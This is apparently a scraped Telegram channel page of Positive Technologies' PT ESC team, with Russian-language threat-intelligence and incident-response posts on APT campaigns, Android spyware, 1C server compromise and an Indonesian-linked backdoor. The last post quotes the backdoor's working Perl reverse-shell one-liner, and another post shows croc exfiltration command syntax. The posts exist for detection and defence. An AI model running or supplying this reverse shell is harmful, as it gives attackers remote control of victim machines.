ESCalator
8.01K subscribers
599 photos
6 videos
18 files
254 links
Tips and tricks от команды экспертного центра безопасности Positive Technologies (PT ESC)
Download Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
😁10🌭54
Группа киберразведки PT ESC представила обзор кибератак за II квартал 2026 года ✍️

В отчете проанализирована активность хакерских группировок, нацеленных на российские организации: от госсектора и ВПК до финансов, здравоохранения и промышленности.

Описана активность шпионских группировок Rare Werewolf, PseudoGamaredon, Tolik, XDSpy, CloudAtlas, BO Team, NetMedved, а также финансово мотивированной Hive0117.

✉️ Основные векторы первоначального доступа:

Таргетированный фишинг с легендами деловой, бухгалтерской и государственной тематики.
Архивы с HTA-, LNK-, JScript-файлами, RAR с BAT-скриптами и документы Office с внедренными шаблонами.
Рассылки со скомпрометированных почтовых ящиков (BEC) для обхода репутационных фильтров.
• Эксплуатация CVE-2026-21509 в Microsoft Office.

🔍 Ключевые находки:

Hive0117 перешла на получение адреса C2 через блокчейн Bitcoin — адрес управляющего сервера кодируется в OP_RETURN-выходе транзакции и не хранится в теле образца.

• CloudAtlas скрывала инфраструктуру за oEmbed-цепочками через легитимные WordPress-сайты.

Ознакомиться с отчетом можно в нашем блоге 🫲

#TI #APT #Malware #Phishing
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22👍11101
Please open Telegram to view this post
VIEW IN TELEGRAM
😁10🔥5💅4🍓31😢1
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20👍8😱74👌1🐳1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁24🔥6🤡5👏3😱1
This media is not supported in your browser
VIEW IN TELEGRAM
Фейковые новости — В С Ё

Специалисты PT ESC обнаружили связанную между собой сеть новостных сайтов, почтовых доменов и аккаунтов в социальных сетях, которые использовались для распространения фейковых новостей.

Подавляющее большинство обнаруженных новостных ресурсов и доменов для отправки писем были зарегистрированы на один и тот же email-адрес ✉️

Сайты и аккаунты в соцсетях в основном маскировались под региональные новостные площадки, а распространяемые через них фейковые материалы часто пересекались между разными ресурсами.

Кроме того, мы обнаружили возможную связь этой инфраструктуры с группировкой Rare Werewolf. Ранее она также использовала похожую тактику на начальном этапе атак — рассылала письма без какой-либо полезной нагрузки.

Подробнее о расследовании можно прочитать в нашем блоге 🗞

#TI #APT #FakeNews #Phishing
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2416😁12🔥9🤣1🤝1🙉1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁8🤨6👀31🤮1👾1
Едем на OFFZONE 2026

На этой неделе постов не было, зато на следующей — выступим с докладами на OFFZONE. Если будете, то заходите. А если не зайдете, то получите потом записи, но не все.

➡️ Девиртуализация Warbird с помощью LLVM / 20 августа, 14:00

Warbird — это внутренняя, официально недокументированная технология Microsoft для защиты кода и DRM. Мало кто знает, но Warbird также имеет виртуализацию, реализованную в нескольких компонентах ядра Windows: ci.dll, clipsp.sys и peauth.sys. На докладе Павел Максютин, ведущий специалист отдела экспертизы PT Sandbox, расскажет о современных подходах к девиртуализации, об устройстве виртуальной машины Warbird и как ему удалось ее сломать с помощью бинарной трансляции и LLVM.

➡️ Et tu, OpenCode: как злоумышленники атакуют агентов и выманивают ваши секреты / 20 августа, 16:10

Наступление эры агентских систем «подарило» злоумышленникам новые векторы атак на пользователей. Чего они добиваются и какие новые техники используют в отношении ассистентов и агентов, расскажет Станислав Раковский, руководитель группы Supply Chain Security. А еще будет практическая проверка того, насколько безопасно использовать ревью коммитов на основе опенсорсных и коммерческих LLM.

➡️ Дочирикались / 21 августа, 16:30

Название доклада отсылает к одной восточноазиатской группировке, которая атаковала цели в Южной Азии и Европе. Злоумышленники внедряли на взломанные легитимные сайты вредоносный JS, подменявший страницы фейковой установкой сертификата и загружавший ранее неизвестный бэкдор.

Максим Шаманов и Александр Бадаев, специалисты TI-департамента PT ESC, расскажут о серьезных OPSEC-ошибках, которые допустили злоумышленники.

Будут и другие доклады от ребят из Позитива — про них в этом посте 😠

@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
👍139👏5🔥3😁2🤩1💩1
DragonDoll: матрешка в мире Android-шпионов 🪆

В начале этой весны специалисты PT ESC обнаружили неизвестный ранее APK-файл, загруженный из Саудовской Аравии. Сам образец содержал много приемов Defense Evasion.

Для усложнения анализа было использовано:

1 техника BadPack
2 этапа загрузки нативных библиотек
1 обфускация на основе LLVM
6 проверок на выполнение в виртуальной среде
и несчитанное количество MBA-выражений

После долгих страданий этапов анализа, с помощью сил эмуляции, законов булевой алгебры и нескольких сотен строк кода наши специалисты распаковали новый Android-шпион DragonDoll 📱

В ходе исследования мы наткнулись на масштабную атаку с участием данного ВПО, направленную на пользователей Android из более чем 26 стран, включая и Россию.

Злоумышленники использовали GitHub как источник распространения и постоянного обновления DragonDoll. Ссылка на этот репозиторий привела на сеть поддельных сайтов с «обновлением» Chrome, содержание которых адаптировалось под язык жертвы.

Разбор того, что лежало под слоем обфускации — в нашем блоге ⬅️

#TI #Android #Malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥196🥰6👍3
Минус один пернатый вор — плюс сто очков рейтинга! 😵

Команда Threat Intelligence экспертного центра безопасности Positive Technologies обнаружила кампанию восточноазиатской группировки FamousSparrow. Группировка использовала новый бэкдор, который мы назвали SquawkDoor, а также новую версию известного бэкдора SparrowDoor 🏴‍☠️

Группировка встраивала вредоносные JS-скрипты на сайты из разных стран. Они показывали пользователю якобы ошибку сертификата на определенном языке и предлагали скачать новый сертификат, который являлся MSI-файлом и приводил к заражению вредоносным бэкдором.

😳 Мы проанализировали бэкдоры: подробно показали новый SquawkDoor и провели детальный анализ отличий нового SparrowDoor от старой версии, а также связанных с ними HemiGate, TernDoor и CrowDoor.

Помимо этого, мы нашли различные пересечения с другими злоумышленниками из Восточной Азии. Также в процессе анализа мы обнаружили связанного с группой пентестера, который готовил атаки.

О том, какие приложения ранее взламывал злоумышленник и какие у него фетиши — читайте в нашем блоге 😏

#TI #APT #Malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23🤣11👏54👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥108👏7👍4
Please open Telegram to view this post
VIEW IN TELEGRAM
😭12😎7👀4
We will croc you 👻

PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации.

Об атаках на 1С с помощью 1cshell мы писали ранее (1, 2, 3).

В рамках расследования инцидента команда PT ESC IR обнаружила компрометацию сервера 1С, работающего на операционной системе семейства Linux 🐧

Среди характерных признаков — наличие вредоносных исполняемых файлов в подкаталогах домашней директории служебного пользователя usr1cv8 и команд в .bash_history того же пользователя — в частности просмотр и удаление файла res.txt, в который записывается результат выполнения кода посредством 1cshell.

/home/usr1cv8/.bash_history: cat res.txt

/home/usr1cv8/.bash_history: rm res.txt


После получения доступа в систему PhantomCore установили ReverseSSH-туннель, что является типичным поведением для данной группировки.

🕵️‍♂️ Помимо часто используемого инструментария, мы встретили и более диковинную утилиту croc, предназначенную для удаленной загрузки и эксфильтрации файлов.

На исследуемом узле были обнаружены команды формата: CROC_SECRET=[REDACTED] ./croc

С помощью нее злоумышленники могли загрузить на скомпрометированный узел файл, который был предварительно отправлен через веб-интерфейс https://getcroc.com/ (на скриншоте) или с другого компьютера, на котором установлен croc.

💡 Для поиска следов использования croc можно поискать исполняемый файл с соответствующим именем, а также использование переменной окружения CROC_SECRET.

В качестве сетевого индикатора может служить домен getcroc.com.

#ir #tip #apt #detect #dfir
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥189🫡91🤔1
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23👍11💯7😨2👾2
Он вам не gsocket 😑

В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket).

После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта.

1️⃣ hsocket — бэкдор, имеющий следующий функционал:

• запуск интерактивной командной оболочки

• запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter)

• сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов)

• защита файлов от удаления

• установление reverse shell-соединения с управляющим сервером с помощью кода на Perl:

perl -e "use Socket;\$i=\"$hsHOST\";\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM,
getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){
open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('sh -i');};"


• скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas)

2️⃣ hfsm — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы.

3️⃣ .hsrc — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов.

В рамках данного исследования нам удалось обнаружить статью, написанную на индонезийском языке, в которой было описано данное ВПО.

Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском:

// Fungsi untuk tampilan halaman login
$Warning = "### ⚠️Info!! Terdekteksi Aktivitas Dari";


Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода:

//------------------GECKO SHELL, RECODED BY AYANA--------------------//
<!-- Gecko Folder File Manager -->


IoC:

hsocket.io
/tmp/hs-data/


#ir #dfir #detect #ioc #malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥167👍6